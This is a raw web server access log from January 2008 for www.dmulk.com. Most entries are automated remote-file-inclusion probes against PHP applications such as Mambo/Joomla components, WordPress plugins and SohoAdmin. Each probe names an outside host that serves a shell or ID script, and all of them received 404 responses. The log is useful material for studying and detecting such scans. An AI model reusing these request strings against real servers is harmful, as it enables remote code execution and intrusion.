70.85.58.82 - - [18/Jan/2008:14:27:47 -0800] "GET /logs/access_071231.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.58.82 - - [18/Jan/2008:14:27:48 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.58.82 - - [18/Jan/2008:14:27:48 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.63.172.153 - - [18/Jan/2008:14:29:01 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
168.243.203.247 - - [18/Jan/2008:14:30:01 -0800] "GET /logs/access_071231.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
168.243.203.247 - - [18/Jan/2008:14:30:02 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
168.243.203.247 - - [18/Jan/2008:14:30:02 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.158.154 - - [18/Jan/2008:14:31:10 -0800] "GET /logs/access_080101.log//tools/send_reminders.php?noSet=0&includedir=http://proscripting.altervista.org/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.51.158.154 - - [18/Jan/2008:14:31:10 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://proscripting.altervista.org/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.51.158.154 - - [18/Jan/2008:14:31:10 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://proscripting.altervista.org/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.54.106.194 - - [18/Jan/2008:14:32:23 -0800] "GET /logs/access_071122.log/components/com_simpleboard/image_upload.php?sbp=http://phpmaster.evolink.ro/shell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.54.106.194 - - [18/Jan/2008:14:32:23 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://phpmaster.evolink.ro/shell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.54.106.194 - - [18/Jan/2008:14:32:24 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://phpmaster.evolink.ro/shell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.53.147.60 - - [18/Jan/2008:14:33:24 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
208.53.147.60 - - [18/Jan/2008:14:33:24 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
208.53.147.60 - - [18/Jan/2008:14:33:24 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
208.53.147.60 - - [18/Jan/2008:14:33:25 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
208.53.147.60 - - [18/Jan/2008:14:33:25 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
208.53.147.60 - - [18/Jan/2008:14:33:25 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
208.53.147.60 - - [18/Jan/2008:14:35:14 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
208.53.147.60 - - [18/Jan/2008:14:35:14 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
208.53.147.60 - - [18/Jan/2008:14:35:14 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
208.53.147.60 - - [18/Jan/2008:14:35:14 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
208.53.147.60 - - [18/Jan/2008:14:35:14 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
208.53.147.60 - - [18/Jan/2008:14:35:14 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
74.6.19.104 - - [18/Jan/2008:14:35:31 -0800] "GET /logs/access_071112.log HTTP/1.0" 200 46565 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
220.128.148.83 - - [18/Jan/2008:14:35:53 -0800] "GET /logs/access_071230.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.128.148.83 - - [18/Jan/2008:14:35:53 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.33.77 - - [18/Jan/2008:14:35:53 -0800] "GET /logs/access_071229.log/@rfihttp://h1.ripway.com/modus/gambar/a??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.33.77 - - [18/Jan/2008:14:35:54 -0800] "GET /@rfihttp://h1.ripway.com/modus/gambar/a??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.33.77 - - [18/Jan/2008:14:35:54 -0800] "GET /logs/@rfihttp://h1.ripway.com/modus/gambar/a??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.33.77 - - [18/Jan/2008:14:36:08 -0800] "GET /logs/access.log/@rfihttp://h1.ripway.com/modus/gambar/a??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.98.97 - - [18/Jan/2008:14:36:13 -0800] "GET /logs/access.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.98.97 - - [18/Jan/2008:14:36:14 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.98.97 - - [18/Jan/2008:14:36:14 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.51.158.154 - - [18/Jan/2008:14:36:20 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://proscripting.altervista.org/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.98.97 - - [18/Jan/2008:14:36:48 -0800] "GET /logs/access_071228.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:14:37:49 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:14:37:49 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:14:37:51 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:14:37:52 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
76.89.74.219 - - [18/Jan/2008:14:37:53 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "CFNetwork/220" "www.dmulk.com"
72.38.10.218 - - [18/Jan/2008:14:38:10 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shellhttp://bkk1.serversiam.com/~svsyn/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.38.10.218 - - [18/Jan/2008:14:38:37 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://bkk1.serversiam.com/~svsyn/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.216.116 - - [18/Jan/2008:14:38:47 -0800] "GET /logs/access_080101.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.216.116 - - [18/Jan/2008:14:38:48 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.216.116 - - [18/Jan/2008:14:38:48 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.216.116 - - [18/Jan/2008:14:39:39 -0800] "GET /logs/access_080101.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.216.116 - - [18/Jan/2008:14:39:39 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.216.116 - - [18/Jan/2008:14:39:39 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.91.66.79 - - [18/Jan/2008:14:44:12 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.94.1.95 - - [18/Jan/2008:14:44:21 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.94.1.95 - - [18/Jan/2008:14:44:21 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.19.17 - - [18/Jan/2008:14:44:56 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.19.17 - - [18/Jan/2008:14:44:56 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:14:45:12 -0800] "GET /logs/access_080101.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shellhttp://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:14:45:13 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shellhttp://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:14:45:13 -0800] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shellhttp://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.149.216.116 - - [18/Jan/2008:14:46:29 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.216.116 - - [18/Jan/2008:14:46:37 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.40.194.211 - - [18/Jan/2008:14:46:54 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.217.184 - - [18/Jan/2008:14:47:22 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
87.106.217.184 - - [18/Jan/2008:14:47:22 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
87.106.217.184 - - [18/Jan/2008:14:47:27 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
87.106.217.184 - - [18/Jan/2008:14:47:27 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:14:48:29 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:14:48:30 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:14:48:30 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.21 - - [18/Jan/2008:14:48:34 -0800] "GET /funny/?N=A HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:14:48:45 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.76.111.11 - - [18/Jan/2008:14:48:58 -0800] "GET /logs/access_071230.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.boletinturistico.com:85/AdManagerPro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.76.111.11 - - [18/Jan/2008:14:48:58 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.boletinturistico.com:85/AdManagerPro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.76.111.11 - - [18/Jan/2008:14:48:58 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.boletinturistico.com:85/AdManagerPro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:14:49:18 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:14:49:19 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:14:49:19 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.200.70.198 - - [18/Jan/2008:14:49:20 -0800] "GET /logs/access_080101.log/components/com_forum/download.php?phpbb_root_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.200.70.198 - - [18/Jan/2008:14:49:20 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.200.70.198 - - [18/Jan/2008:14:49:20 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:14:49:33 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.148.140 - - [18/Jan/2008:14:49:57 -0800] "GET /logs/access_071205.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:14:50:49 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:14:50:49 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.76.111.11 - - [18/Jan/2008:14:50:49 -0800] "GET /logs/access_071225.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.boletinturistico.com:85/AdManagerPro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:14:50:49 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.76.111.11 - - [18/Jan/2008:14:50:50 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.boletinturistico.com:85/AdManagerPro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.76.111.11 - - [18/Jan/2008:14:50:50 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.boletinturistico.com:85/AdManagerPro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:14:50:59 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.77.116 - - [18/Jan/2008:14:50:59 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.77.116 - - [18/Jan/2008:14:50:59 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:14:50:59 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:14:51:00 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:14:51:04 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:14:51:14 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.76.111.11 - - [18/Jan/2008:14:51:43 -0800] "GET /logs/access_071214.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.boletinturistico.com:85/AdManagerPro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:14:54:14 -0800] "GET /logs/access_071228.log/skin/zero_vote/setup.php?dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:14:54:15 -0800] "GET /skin/zero_vote/setup.php?dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:14:54:15 -0800] "GET /logs/skin/zero_vote/setup.php?dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:14:54:17 -0800] "GET /logs/access_071228.log/skin/zero_vote/setup.php?dir=http://www.mta.cl/galeria2/galery2.jpg???????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:14:54:17 -0800] "GET /skin/zero_vote/setup.php?dir=http://www.mta.cl/galeria2/galery2.jpg???????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
